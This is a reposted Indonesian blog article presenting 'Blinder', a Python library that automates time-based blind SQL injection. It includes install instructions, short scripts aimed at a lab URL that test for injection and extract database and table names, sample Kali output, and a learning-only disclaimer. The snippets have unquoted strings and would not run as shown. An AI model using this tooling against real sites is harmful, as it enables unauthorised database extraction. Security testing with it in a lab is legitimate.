Blinder – A Python Library To Automate Time-Based Blind SQL Injection

By Minggu, 02 Februari 2020 Add Comment
Blinder – A Python Library To Automate Time-Based Blind SQL Injection - Hai Semua, selamat datang di blog Noob1t4, Pada Artikel yang kalian baca kali ini dengan judul Blinder – A Python Library To Automate Time-Based Blind SQL Injection, kami telah mempersiapkan artikel ini dengan baik untuk kalian baca dan ambil informasi didalamnya. mudah-mudahan isi postingan yang kami tulis ini dapat kalian pahami. baiklah, selamat membaca.

Blinder – A Python Library To Automate Time-Based Blind SQL Injection.


Blinder


Blidner is a small python library to automate time-based blind SQL injection by using a pre defined queries as a functions to automate a rapid PoC development.


Installation


You can install Blinder using the following command:


pip install blinder

Or by downloading the source and importing it manually to your project.


Usage


To use blinder you need to import Blinder module then start using the main functions of Blinder.


You can use Blinder “with the current version” to do the following:



  • Check for time based injection.

  • Get database name.

  • Get tables names.


You can check for injection in a URL using the following code:


#!/usr/bin/python

import Blinder

blind = Blinder.blinder(
    http://sqli-lab/sql_injection/index.php?search=3,
    sleep=1
 )

print blind.check_injection()

The execution result will be:


root@kali: /Desktop# python check.py
True
root@kali: /Desktop#

You can Get database name using the following code:


#!/usr/bin/python

import Blinder

blind = Blinder.blinder(
http://sqli-lab/sql_injection/index.php?search=3,
sleep=1
)

print Database name is : %s  % blind.get_database()

And the results will be:


root@kali: /Desktop# python get-database.py
Database name is : db1
root@kali: /Desktop#

To get tables names you can use the following code:


#!/usr/bin/python

import Blinder

blind = Blinder.blinder(
    http://sqli-lab/sql_injection/index.php?search=3,
    sleep=1
 )

tables = blind.get_tables()

for table in tables:
    print table

And the results will be:


root@kali: /Desktop# python get-tables.py
blogs
notes
root@kali: /Desktop#

TODO


A lot of features should be added soon like:



  • the ability of adding customized query

  • test injection points based on burp request

  • extract tables/columns data


GitHub



  • https://github.com/mhaskar/Blinder



Sumber http://noob1t4.blogspot.com/

Artikel Menarik Lainnya:




Sekian Artikel Blinder – A Python Library To Automate Time-Based Blind SQL Injection.
Terima kasih telah membaca artikel Blinder – A Python Library To Automate Time-Based Blind SQL Injection, mudah-mudahan bisa memberi manfaat untuk kalian semua. Baiklah, sampai jumpa di postingan artikel lainnya.


Semua artikel tutorial di blog ini hanya untuk sebatas Pembelajaran dan Pengetahuan saja, jika kalian meyalahgunakan tutorial di blog ini, itu bukan tanggung jawab saya. Terima kasih sudah berkunjung ke blog Noob1t4, saya harap agan berkunjung kembali kesini

0 Response to "Blinder – A Python Library To Automate Time-Based Blind SQL Injection"

Posting Komentar

Langganan: Posting Komentar (Atom)

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel